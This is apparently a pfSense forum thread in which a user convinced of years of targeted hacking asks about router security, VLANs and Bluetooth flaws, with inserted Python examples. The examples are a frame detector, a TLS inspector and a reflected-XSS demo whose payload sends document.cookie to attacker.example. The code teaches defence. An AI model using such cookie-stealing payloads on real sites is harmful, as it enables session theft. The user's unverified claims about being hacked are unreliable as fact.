6100 + Zen FTTP (UK) + NordVPN Setup
-
@nogbadthebad Thanks! So years ago supposedly there were "no rootkits on Macs", of course "no malware", "router cannot be hacked whatsoever", etc.
I basically completely gave up trying & just accepted the situation (at this stage I think it's just a running meme, to keep hacking me until I'm x...)
However, returning to the situation once again, it's likely I have the rootkit right now. What's the best way to detect it? I installed Snort a long time ago and didn't find anything suspicious (or I don't know, maybe I missed something). But I installed it on my Mac, not my Sky router, which at the time couldn't even be changed to an external one.
If I get a new router and install Snort on it, then connect this Mac, will it then [finally] find something?
Or will the hackers just simply switch it off when they know I'm looking for it?
-
If anyone else comes across this in the future - I believe the only truly safe way is a combination with Chromebooks/extensions (that are much less likely to get malware).
https://cryptonews.com/news/trader-s-lesson-why-you-shouldn-t-keep-large-amounts-of-cry-9302.htm
"If you MUST use it, buy a Chromebook and a hardware wallet and use them STRICTLY for Metamask."
"According to him, while a Chromebook limits what can be installed on one’s computer, it still allows installation for potentially malicious browser plugins, so one must beware of installing them." (this is not really a big deal).
I will have to get a separate Mac for music software for 99.9% security, as so much is third party - but this will never connect to my router (I will block it) - damn Bluetooth is so nice but I can hard wire everything I think. And I will use a VPN to access my accounts & downloads to protect my IP, just in case.
Surely this is ultra-secure (with a UTM setup on main router/firewall)? Am I missing anything? New Macbook somehow gets malware, then it's isolated (like a VM, but hardware), and I can check the 'UTM' traffic with Chromebook. Crypto/NFT/MetaMask on Chromebook. 100% secure?
-
Ah yes I was missing VLANs!
https://www.routersecurity.org/vlan.php
"On a home network, the protection offered by isolating these devices is to minimize the impact of a hacked device. Likewise, a malware infested Windows machine can't spread its tentacles, if it can't see any other devices or computers."
This is clearly what happened to me & my family, where it was impossible to escape the hackers, despite spending thousands on buying new devices & changing ISPs. At the same time if I'd been able to invest that money in the cryptos & NFTs I wanted to (knowing the potential), I'd have around $6 billion, instead of being practically homeless.
Thanks @nogbadthebad for leading me on the right path.
-
And also as is proven here, it's very rare to actually find help.
Especially when someone claims/knows that they have been hacked for many years, yet they are constantly branded "delusional" & "crazy", especially if they own a Mac.
Back then I had phone calls with security experts where there was nothing they could do, "not possible", etc. All anyone was interested in is whether they stole any money.
But I guess there are much worse failures to act in this parasitic $hi hole world, so I should just count myself lucky & "stop going on about it" or "just ignore them"?
-
Well apparently all of that still won't be enough to stop them, according to the memes [puke]!
And yes... I see an issue with Zen sending out the PPPoE username & password via "email", which I cannot receive on a secure network because they are hacking everyone I know, and I can't even order it securely. Although hopefully/surely there is a way that Zen support can help with that over the phone...
Secondly it could be due to the use of VLANs, e.g.
https://security.stackexchange.com/questions/238796/what-are-the-security-issues-can-be-exploited-to-vlan-switches-to-compromise-net
"As an abstraction, the operation of a managed switch can be described with three planes:
Management plane used to configure the switch (SSH, HTTP...).
Control plane that controls how the packets should be forwarded (L2) or routed (L3). It can learn MAC addresses from the packets it sees, and there are protocols switches can use to share information, prevent loops (spanning-tree) or handle shortest routing paths (OSPF).
Data plane or forwarding plane that does the actual switching job.
Leaving aside the possible software vulnerabilities in the switch itself, the main issue remains how well the control plane and the management plane are protected from the data forwarded in the data plane. The data plane also handles all the control plane protocol traffic between the switches, and if a packet it sees must be processed by the control plane, forwards the packet to it.
In a secure configuration, every access port can only see the traffic inside its own VLAN, and the switch should not accept any control plane protocol traffic from them. If any of these protocols is open on an access port, an attacker connected to it might mimic another switch and jailbreak from its own VLAN, e.g. by
becoming a spanning-tree root or a node with MitM position.
activating trunking on the port and seeing all traffic with 802.1Q tags (DTP, VTP, HSRP...)
causing DoS attacks, e.g. by flooding the CDP table, or flooding any BPDUs that will cause too much processing on the control plane, exhausting its resources
disabling 802.1Q VLANs altogether, making all networks see each other (VTP).
Yersinia is a tool that automates all these tricks... The management plane must be secured, because by altering the configuration it's possible to remove any lower plane restrictions the port has. Ideally, you'd have a separate management VLAN altogether."
Since I am not a computer science degree university student, I'm not educated enough to understand how to stop them.
Just unbelievable really how there's not a better/consumer way to stay safe!? Normal people don't stand a chance.
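The quoted answer's point about control-plane protocols on access ports, as an added example (mine, not from the thread or the Stack Exchange answer): a Python classifier over raw Ethernet frames that flags what a correctly configured access port should never accept from a host, namely frames that already carry 802.1Q/802.1ad tags (the double-tagging VLAN hop) and STP BPDUs or Cisco CDP/DTP/VTP frames. The multicast addresses, LLC/SNAP headers and Cisco protocol IDs are the standard ones; the MAC addresses and sample frames are constructed by hand, not captured.

```python
"""Added example (not from the forum post or the quoted Stack Exchange answer).
Classifies raw Ethernet frames and reports the two things an access port in a
secure switch configuration should never accept from an end host: frames that
already carry 802.1Q/802.1ad VLAN tags, and control-plane protocol frames
(STP BPDUs, Cisco CDP/DTP/VTP). All sample frames below are constructed."""
import struct

ETHERTYPE_8021Q = 0x8100
ETHERTYPE_8021AD = 0x88A8
STP_MCAST = bytes.fromhex("0180c2000000")      # 01:80:c2:00:00:00, IEEE STP
CISCO_MCAST = bytes.fromhex("01000ccccccc")    # 01:00:0c:cc:cc:cc, CDP/VTP/DTP
CISCO_OUI = bytes.fromhex("00000c")
CISCO_PIDS = {0x2000: "CDP", 0x2003: "VTP", 0x2004: "DTP"}


def _u16(buf: bytes, off: int) -> int:
    if off + 2 > len(buf):
        raise ValueError("truncated frame")
    return struct.unpack_from("!H", buf, off)[0]


def classify_frame(frame: bytes) -> dict:
    """Return destination/source MAC, the VLAN IDs of any tag stack, and the
    control-plane protocol carried (or None)."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst, src = frame[:6], frame[6:12]
    off = 12
    vlan_tags = []
    ethertype = _u16(frame, off)
    while ethertype in (ETHERTYPE_8021Q, ETHERTYPE_8021AD):
        vlan_tags.append(_u16(frame, off + 2) & 0x0FFF)  # VID is the low 12 bits of the TCI
        off += 4
        ethertype = _u16(frame, off)
    off += 2
    proto = None
    if ethertype <= 1500 and len(frame) >= off + 3:     # 802.3 length field: LLC header follows
        dsap, ssap = frame[off], frame[off + 1]
        if dsap == 0x42 and ssap == 0x42 and dst == STP_MCAST:
            proto = "STP-BPDU"
        elif dsap == 0xAA and ssap == 0xAA and len(frame) >= off + 8:  # SNAP header
            if frame[off + 3:off + 6] == CISCO_OUI:
                proto = CISCO_PIDS.get(_u16(frame, off + 6))
    return {"dst": dst.hex(":"), "src": src.hex(":"),
            "vlan_tags": vlan_tags, "control_proto": proto}


def access_port_violations(frames) -> list:
    """Frames a host on an access port should not be sending (and that a secure
    port should drop): anything already tagged, or any control-plane protocol."""
    found = []
    for frame in frames:
        info = classify_frame(frame)
        if info["vlan_tags"] or info["control_proto"]:
            found.append(info)
    return found


# --- constructed sample frames (hypothetical MACs, zero-filled payloads) ---
def _frame(dst, src, ethertype_or_len, payload, tags=()):
    hdr = dst + src
    for vid in tags:
        hdr += struct.pack("!HH", ETHERTYPE_8021Q, vid)
    return hdr + struct.pack("!H", ethertype_or_len) + payload


def _cisco_snap(pid):
    return b"\xaa\xaa\x03" + CISCO_OUI + struct.pack("!H", pid)


HOST_MAC = bytes.fromhex("02aabbccdd01")
GW_MAC = bytes.fromhex("02aabbccdd02")
DTP_PAYLOAD = _cisco_snap(0x2004) + b"\x01" + bytes(30)
BPDU_PAYLOAD = b"\x42\x42\x03" + bytes(35)
IP_PAYLOAD = bytes(46)

SAMPLES = [
    _frame(GW_MAC, HOST_MAC, 0x0800, IP_PAYLOAD),                   # ordinary untagged IP
    _frame(GW_MAC, HOST_MAC, 0x0800, IP_PAYLOAD, tags=(1, 20)),     # double-tagged (VLAN hop)
    _frame(CISCO_MCAST, HOST_MAC, len(DTP_PAYLOAD), DTP_PAYLOAD),   # DTP from a host port
    _frame(STP_MCAST, HOST_MAC, len(BPDU_PAYLOAD), BPDU_PAYLOAD),   # rogue BPDU
]

if __name__ == "__main__":
    for violation in access_port_violations(SAMPLES):
        print(violation)
```

The switch-side fix the answer describes is to make the port a plain access port (no DTP negotiation, BPDU guard, VTP not accepting updates from it); this script is the check you would run on a capture from such a port to confirm nothing of that kind is reaching the control plane.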
-
@nogbadthebad Uff, do you have any idea what all of this means?
https://oneplus-x.github.io/2017/02/25/ISP-Hacking/
"What can ISPs do?
Enforce stronger authentication mechanisms like PPPoE-CHAP, with a strong password policy for the same."
In my previous home, there was an incident where someone took the fiber box off the outside wall & did something suspicious!!! I actually saw 'him' when he stood up right at the window then walked off. I thought WTF? Then when I went outside the box/cover was off the wall & on the floor!?
I thought, and apparently according to everyone, nothing can be done to physically hack that way, such as connecting some kind of device, can they? F*kin insane what I've been through!
Even having to deal with 2 family deaths, clearly extreme PTSD (ongoing), health issues - nothing will stop these parasitic psychopaths! It's one big hilarious game to them, with endless memes or "lulz"............
-
@bworks said in 6100 + Zen FTTP (UK) + NordVPN Setup:
https://oneplus-x.github.io/2017/02/25/ISP-Hacking/
Not a clue, I'm not an ISP
-
@nogbadthebad Well I will have to get the cyber security experts in to figure this out, I guess.
Back in the day there was practically no one, other than starting prices of $300K for massive companies (and even them telling me things were impossible that have been proven today).
All of this that has been 100% confirmed was supposedly "impossible" back then:
https://www.theweek.co.uk/news/uk-news/952744/outdated-internet-routers-put-millions-at-risk-of-being-hacked
Every single expert said no malware or anything for Macs.
All of the security experts need to realise that these underground hacking gangs have their own little secrets. Look now, literally everything that was "impossible" has been proven. Even iPhones hacked into. The info comes out years down the line.
-
@bworks said in 6100 + Zen FTTP (UK) + NordVPN Setup:
https://oneplus-x.github.io/2017/02/25/ISP-Hacking/
That only really applies to an apartment building scenario as described. If you're using FTTC (VDSL) you are not in a broadcast domain like that. FTTP (GPON) is also not that, though without testing it I'm unsure what you would see there. I doubt you could MITM the PPP session though.
If you're on BT for example they use the same password for all clients, you don't actually need a password. You are authenticated by connecting from the right line so the PPP credentials are unimportant.
Steve
-
@stephenw10 thanks! I agree it's probably a secure part of the network - but can't say 100% anymore.
There's likely another way they are thinking about...
There are ‘bugs’ in every single software! That’s why there are endless “security updates” / “make sure you install the latest firmware updates”, blah blah blah.
The fact is the software has already had the bug(s) long before the updates! And only ethical hackers are reporting them.
Check out this:
https://routersecurity.org/bugs.php
The bug that scares me the most is the one that allows bad guys to bypass a router firewall and attack devices directly. He tested four consumer routers and found two were vulnerable, but he did not name names and did not say which of the 12 bugs they were vulnerable to.
“Bugs bugs bugs………”
2 years Virgin Media does nothing (I’ve been with them in the past)
Even Fortinet/Fortigate bugs / Cisco “backdoor account”, “flaw leaves small business networks wide open”
What is the history of “bugs” on Netgate hardware / PFSense?
Unfortunately as soon as there are any single flaws in the software, that's it. I'm not waiting for the hackers to come along.
-
And there goes "bluetooth is invincible" / "impossible" as well:
"Millions of Wi-Fi access points sold by Cisco, Meraki, and Aruba have a critical Bluetooth bug that could allow attackers to install and run malware on the devices. The bug was found by Armis. The malware could get access to all subnets, that is, it would not be stopped by a VLAN. The bug is in Bluetooth Low Energy (BLE), in software from Texas Instruments; they were aware of the issue, but they were not aware that it could be exploited in such a malicious manner."
"Not me, Bluetooth is always disabled on my phone."
"Way to go Aruba. An attacker can learn the password by sniffing a legitimate update or reverse-engineering the device. Game over. Bad guys can then install any firmware they want."
"Tin foil hat: a reader comment at Ars raised an issue that I first heard at a security conference this past summer. What if the removal of 3.5 mm audio ports in phones was to force more people to keep Bluetooth enabled, and thus, keep them traceable?
If that is true, we won't know for at least 30 years."
-
And regarding bluetooth, my iPhone tries to connect to my Bose speakers fairly frequently, despite the speakers being turned off (with no battery) & the bluetooth turned off on my iPhone!!!
-
"Decade-long vulnerability in multiple routers could allow network compromise"
Just utterly ridiculous! Clearly there is something malicious going on behind the scenes also. They don't care a less about the hackers [ruining lives] that are using their hidden backdoors. Only when money is stolen & there's something to trace.
In the meantime governments around the world hacking innocent individuals, destroying lives, all to keep control / bully the innocent people.
-
Well pfSense has no Bluetooth support at all so that's one thing not to worry about.
It depends what you mean by 'bug'. You can check the entire bug history if you want here:
https://redmine.pfsense.org/projects/pfsense/issues
Most of those are not security issues though. What you probably want is this:
https://docs.netgate.com/advisories/index.html
Steve
-
@stephenw10 thanks Stephen! On the first document I found:
Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised.
- Do not log into the firewall with the same browser used for non-administrative web browsing.
My plan is to use a dedicated Chromebook just for accessing the router.
I will go through the list for more potential tips...
I'll say I think it's better to go with open source than commercial due to these entities possibly creating backdoors on purpose & keeping them secret for as long as possible. I don't see the same thing happening with open source.
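The advisory text quoted above (a parameter reflected into the page without proper encoding, so script in it runs in the admin's browser) as an added example in Python, mine and not taken from the advisory or from pfSense's own PHP source: the vulnerable render beside the encoded one, plus a small checker that parses the rendered HTML and reports script elements or on* event handlers. The page template, the parameter name `q`, the `attacker.example` host and the payloads are all constructed for the demo.

```python
"""Added example (mine, not from the Netgate advisory or pfSense source): the
reflected-XSS pattern the advisory describes, a request parameter echoed into
HTML without encoding, beside the encoded version, plus a checker that parses
the rendered page and reports script tags or on* event handlers.
Template, parameter name and payloads are constructed for the demo."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

# Hypothetical page: the parameter lands in a text node and in a quoted attribute.
TEMPLATE = '<p>Filter: {text}</p>\n<input type="text" name="q" value="{attr}">'


def _param(query_string: str) -> str:
    return parse_qs(query_string, keep_blank_values=True).get("q", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """What the advisory warns about: the raw parameter is interpolated as-is."""
    q = _param(query_string)
    return TEMPLATE.format(text=q, attr=q)


def render_fixed(query_string: str) -> str:
    """Encode for the HTML context. html.escape rewrites < > & " and ' so the
    value can neither open a tag in the text node nor close the quoted
    attribute. This is only sufficient because the attribute is quoted in the
    template; an unquoted attribute would still be breakable with a space."""
    q = _param(query_string)
    safe = html.escape(q, quote=True)
    return TEMPLATE.format(text=safe, attr=safe)


class _ActiveContent(HTMLParser):
    """Collects script elements and on* handler attributes from rendered HTML."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script", None))
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.findings.append((tag, name))


def active_content(rendered: str) -> list:
    """Return (tag, attribute) pairs for every piece of active content found."""
    parser = _ActiveContent()
    parser.feed(rendered)
    parser.close()
    return parser.findings


# Constructed payloads: one targets the text node, one breaks out of the attribute.
PAYLOADS = [
    "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
    '"><img src=x onerror=alert(document.cookie)>',
]


def compare(payload: str) -> dict:
    """Run one payload through both renderers and report what survives as code."""
    qs = urlencode({"q": payload})
    return {"vulnerable": active_content(render_vulnerable(qs)),
            "fixed": active_content(render_fixed(qs))}


if __name__ == "__main__":
    for p in PAYLOADS:
        print(compare(p))
```

The advisory's workaround (a browser used only for the firewall GUI) limits what a successful reflection can reach, because the attacker needs the admin to open a crafted link in a browser that holds the session; output encoding removes the reflection itself.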
-
@stephenw10 holy crap, well there you go:
Researchers at the École Polytechnique Fédérale de Lausanne (EPFL) and Purdue University have independently identified vulnerabilities related to Cross-Transport Key Derivation (CTKD) in implementations supporting pairing and encryption with both Bluetooth BR/EDR and LE in Bluetooth Specifications 4.0 through 5.0 […]
For this attack to be successful, an attacking device would need to be within wireless range of a vulnerable Bluetooth device supporting both BR/EDR and LE transports that supports CTKD between the transports and permits pairing on either the BR/EDR or LE transport either with no authentication (e.g. JustWorks) or no user-controlled access restrictions on the availability of pairing. If a device spoofing another device’s identity becomes paired or bonded on a transport and CTKD is used to derive a key which then overwrites a pre-existing key of greater strength or that was created using authentication, then access to authenticated services may occur. This may permit a Man In The Middle (MITM) attack between devices previously bonded using authenticated pairing when those peer devices are both vulnerable.
"Vulnerability to so-called Man-In-The-Middle (MITM) attacks is less clear. With some of these, an attacker can impersonate a previously paired device, which would then be allowed to connect without user intervention"
https://9to5mac.com/2020/09/10/bluetooth-security-flaw-2/
Seems to be exactly what was/is happening to my iPhone.
My bet is, despite bluetooth being secure, Apple are leaving backdoors in, and underground hacker gangs are finding these out & keeping the flaws to themselves. These vulnerabilities stay secret for years (or a "decade").
-
There is always a trade-off between security and convenience. You just have to realise that the vast majority of users are at the convenience end of that scale and manufacturers are targeting mostly those users....
But that's a conversation for 'off-topic' it's not Netgate hardware related.
Steve
-
@stephenw10 so what would you suggest as the most secure setup that I can create [with the Netgate/PFSense router]?
Again, my plan is 1 Chromebook solely for configuring the router (if the Chromebook can remain offline whilst configuring that would be better...).
2nd Chromebook for web browsing, and accessing my web hosts - shouldn't be able to get malware but not sure what other vulnerabilities there are - e.g. turn off javascript?...
And a Macbook Pro for all of my actual works (Adobe, AE plugins, Music plugins, etc.) - only use the internet to install the programs (many 3rd party), and install updates. Keep the internet off as much as possible. Send my web development assets to the cloud rather than accessing my web hosting directly (where my passwords may be exposed some how).
I still can't see myself being able to invest in crypto/NFTs, even with a dedicated Chromebook for it...
Unless, is there a way to detect any sort of hack, not just malware? How do so many big companies go for so long without realising they are being hacked? Aren't they monitoring their outgoing traffic (e.g. through Snort, etc.)?
Obviously no bluetooth on devices, no wireless devices (no wifi at all), VLANs, VPN... what about ACLs with PFSense, do they increase security?
-
Hmm, well it doesn't appear that Snort would be useful, since I can't remember the last time I visited a non-https website, and it does nothing for an encrypted connection.
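What an IDS on the firewall can and cannot see of an HTTPS connection, as an added example (mine, not from the thread): the application data is ciphertext and gives signatures nothing to match, but the ClientHello at the start of every TLS session is still plaintext, so the destination host name (SNI) and the offered cipher suites remain visible and are what Snort-style rules on TLS traffic actually key on. The ClientHello below is constructed (zero-filled random, a few fixed cipher suites, an SNI extension), not a capture, and the parser only covers the fields it needs.

```python
"""Added example (mine, not from the thread): what a passive inspector on the
router learns from TLS. Builds a constructed ClientHello (fixed zero 'random',
a few cipher suites, an SNI extension) and an opaque Application Data record,
then inspects both: handshake metadata (SNI, cipher suites) is readable, the
encrypted payload is not."""
import struct

REC_HANDSHAKE, REC_APP_DATA = 0x16, 0x17
HS_CLIENT_HELLO = 0x01
EXT_SERVER_NAME = 0x0000


def _u16(buf: bytes, off: int) -> int:
    if off + 2 > len(buf):
        raise ValueError("truncated TLS data")
    return struct.unpack_from("!H", buf, off)[0]


def build_client_hello(server_name: str, cipher_suites=(0x1301, 0x1302, 0xC02B)) -> bytes:
    """Constructed ClientHello wrapped in one TLS record (not a captured one)."""
    name = server_name.encode("ascii")
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name      # name_type 0 = host_name
    sni_ext = (struct.pack("!HH", EXT_SERVER_NAME, len(sni_entry) + 2)
               + struct.pack("!H", len(sni_entry)) + sni_entry)
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (b"\x03\x03" + bytes(32)                 # client_version, random (zeros here)
            + b"\x00"                               # empty session_id
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00"                           # one compression method: null
            + struct.pack("!H", len(sni_ext)) + sni_ext)
    hs = bytes([HS_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([REC_HANDSHAKE, 0x03, 0x01]) + struct.pack("!H", len(hs)) + hs


def build_app_data(ciphertext: bytes) -> bytes:
    """An Application Data record: after the handshake, this is all the IDS sees."""
    return bytes([REC_APP_DATA, 0x03, 0x03]) + struct.pack("!H", len(ciphertext)) + ciphertext


def inspect_record(record: bytes) -> dict:
    """Return what a passive inspector learns from one TLS record."""
    if len(record) < 5:
        raise ValueError("truncated record header")
    ctype = record[0]
    body = record[5:5 + _u16(record, 3)]
    info = {"type": None, "sni": None, "cipher_suites": [], "payload_inspectable": False}
    if ctype == REC_APP_DATA:
        info["type"] = "application_data"           # ciphertext: nothing for signatures to match
        return info
    if ctype != REC_HANDSHAKE or len(body) < 4 or body[0] != HS_CLIENT_HELLO:
        info["type"] = "other"
        return info
    info["type"] = "client_hello"
    info["payload_inspectable"] = True
    hs = body[4:4 + int.from_bytes(body[1:4], "big")]
    pos = 2 + 32                                    # skip client_version and random
    pos += 1 + hs[pos]                              # session_id
    n = _u16(hs, pos)
    pos += 2
    info["cipher_suites"] = [_u16(hs, pos + i) for i in range(0, n, 2)]
    pos += n
    pos += 1 + hs[pos]                              # compression methods
    if pos + 2 > len(hs):
        return info                                 # no extensions block at all
    ext_end = pos + 2 + _u16(hs, pos)
    pos += 2
    while pos + 4 <= ext_end:
        etype, elen = _u16(hs, pos), _u16(hs, pos + 2)
        pos += 4
        if etype == EXT_SERVER_NAME:
            list_end = pos + 2 + _u16(hs, pos)
            p = pos + 2
            while p + 3 <= list_end:
                ntype, nlen = hs[p], _u16(hs, p + 1)
                p += 3
                if ntype == 0:
                    info["sni"] = hs[p:p + nlen].decode("ascii", "replace")
                    break
                p += nlen
        pos += elen
    return info


if __name__ == "__main__":
    print(inspect_record(build_client_hello("example.com")))
    print(inspect_record(build_app_data(bytes(range(48)))))
```

This is also why outbound monitoring on a network like the one described still has value without decrypting anything: DNS queries, SNI and the set of hosts a machine talks to are enough to notice a device reaching somewhere it never should, even though the content of each connection is opaque (and with Encrypted Client Hello even the SNI may disappear, leaving only DNS and destination addresses).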
-
The concept of an off-line Chromebook is probably not going to work well. ChromeOS expects to always be online.
If you're aiming at the secure end of the security/convenience scale use Tails. It is quite inconvenient though.
Again though, this is not really specific to the 6100 so it would be better in a different thread.
Steve